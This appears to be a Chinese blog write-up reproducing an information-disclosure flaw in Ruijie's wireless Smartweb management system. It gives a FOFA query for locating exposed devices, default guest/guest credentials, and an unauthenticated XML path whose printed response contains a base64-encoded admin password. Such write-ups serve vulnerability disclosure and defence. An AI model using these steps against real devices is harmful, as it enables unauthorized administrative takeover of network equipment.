漏洞描述

i ⭐锐捷网络股份有限公司无线smartweb管理系统存在逻辑缺陷漏洞,攻击者可从漏洞获取到管理员账号密码,从而以管理员权限登录。

漏洞影响

s ✅锐捷网络股份有限公司 无线smartweb管理系统

空间测绘

d ⭕FOFA:title="无线smartWeb--登录页面"

漏洞复现

  • ✅访问首页,存在账号guest/guest登陆

  • 而且响应中包含了 admin密码的base64加密,直接全局搜索admin可以看到

  • 访问未授权路径/web/xml/webuser-auth.xml
<userauth>
<user>
<name>
<![CDATA[ admin ]]>
</name>
<password>
<![CDATA[ YWRtaW46cXNsYmJzaHlj ]]>
</password>
<page>all</page>
<level>0</level>
<favorites>
<![CDATA[ ]]>
</favorites>
</user>

个人博客

孤桜懶契:https://gylq.gitee.io/time

锐捷 Smartweb管理系统 密码信息泄露漏洞相关推荐

  1. CNVD-2021-17369 -- 锐捷Smartweb管理系统 密码信息泄露漏洞

    锐捷Smartweb管理系统 密码信息泄露漏洞 0X001前言 0X002 漏洞影响 0X003 漏洞原理 0X004 漏洞复现 0X041 空间搜索寻找目标 0X042尝试弱口令登陆 0X043查看 ...

  2. 锐捷 Smartweb管理系统 命令执行漏洞

    锐捷 Smartweb管理系统 0x01 漏洞描述 0x02 漏洞指纹 0x03 漏洞复现 0x01 漏洞描述 锐捷网络是一家拥有包括交换机.路由器.软件.安全防火墙.无线产品.存储等全系列的网络设备 ...

  3. MessageSolution企业邮件归档管理系统EEA信息泄露漏洞(cnvd-2021-10543)

    MessageSolution企业邮件归档管理系统EEA信息泄露漏洞(cnvd-2021-10543) 1.漏洞描述 MessageSolution企业邮件归档管理系统 / MessageSoluti ...

  4. D-Link DCS系列监控 账号密码信息泄露漏洞

    漏洞简介 D-Link DCS-2200是一款监控摄像机,成像色彩为彩色 是一款网络摄像机, 根据VULDB 所看到的信息原文如下 A vulnerability, which was classif ...

  5. 多家防火墙设备存在信息泄露漏洞

    概述 漏洞名称 多家防火墙设备存在信息泄露漏洞安全通告 发布日期 2021-06-16 受影响产品及版本 胜鑫塔下一代防火墙XT6000-A-FW-1.0.0-0-2778 利谱第二代防火墙6164- ...

  6. 配置snmp_多种设备基于 SNMP 协议的敏感信息泄露漏洞数据分析报告

    作者:知道创宇404实验室 1. 更新情况 2. 事件概述 SNMP协议[1],即简单网络管理协议(SNMP,Simple Network Management Protocol),默认端口为 161 ...

  7. MessageSolution 邮件归档系统EEA 信息泄露漏洞 CNVD-2021-10543复现

    MessageSolution 邮件归档系统EEA 信息泄露漏洞 CNVD-2021-10543复现 一.简介 MessageSolution企业邮件归档管理系统 EEA是北京易讯思达科技开发有限公司 ...

  8. 基于MessageSolution 邮件归档系统EEA的通用型信息泄露漏洞挖洞

    前几天无意间看到这个通用型漏洞,编号是CNVD-2021-10543,想着也来试试.MessageSolution企业邮件归档管理系统 EEA是北京易讯思达科技开发有限公司开发的一款邮件归档系统.该系 ...

  9. CNVD-2021-10543 -- MessageSolution 邮件归档系统EEA 信息泄露漏洞

    MessageSolution 邮件归档系统EEA 信息泄露漏洞 0X001前言 0X002 漏洞影响 0X003 漏洞原理 0X004 漏洞复现 0X041 空间搜索寻找目标 0X042获取敏感信息 ...

最新文章

  1. 全球及中国汽车涂料市场前景态势与投资渠道分析报告2022版
  2. [Android] 使用Matrix矩阵类对图像进行缩放、旋转、对比度、亮度处理
  3. 两个学习英语的好软件
  4. java des3加密_JAVA加密算法(3)- 对称加密算法(DES、3DES、AES)
  5. 各位大佬,Spark的重点难点系列暂时更新完毕
  6. Scrapy豆瓣电影top250(excel保存和图片下载)
  7. 解决qt.qpa.plugin: Could not load the Qt platform plugin “xcb“问题
  8. as常用固定搭配_初中英语常用固定搭配
  9. 硬盘三大种类( SSD ; HHD ; HDD )
  10. [歪谈]拽一个贵人出来给你当炮架子
  11. 微信小程序(八)实战——加载图片images
  12. android全局的dialog,使android的dialog全局显示
  13. base64真正的作用和意义
  14. 算法学习-零子数组,最大连续子数组
  15. TAKE2获GRAIL 授权早期鼻咽癌检测技术
  16. 论文参考文献类型代码及书写格式
  17. ctf-crypto-7+1+0
  18. ubuntu中对于大小写锁定键的控制
  19. 小程序引用阿里iconfont
  20. Python仓库管理系统源代码,库存管理系统源码,基于flask,内含数据库文件,已实现出入库、库存预警,库存搜索等功能

热门文章

  1. 京东商品及评论 数据采集
  2. mysql删除用户并回收权限
  3. RootBeanDefinition、ChildBeanDefinition、GenericBeanDefinition的区别
  4. python与机器学习
  5. [益智]:怎么称才能用三次就找到球
  6. 启动计算机加载状态监控器,状态监控器显示脱机。
  7. 旺旺机器人的快捷短语_机器人配置和我的快捷短语
  8. 《赢在用户-Web人物角色创建和应用实践指南》
  9. openstack跟着官网部署过程
  10. ImportError: cannot import name ‘get_num_classes’ from ‘torchmetrics.utilities.data’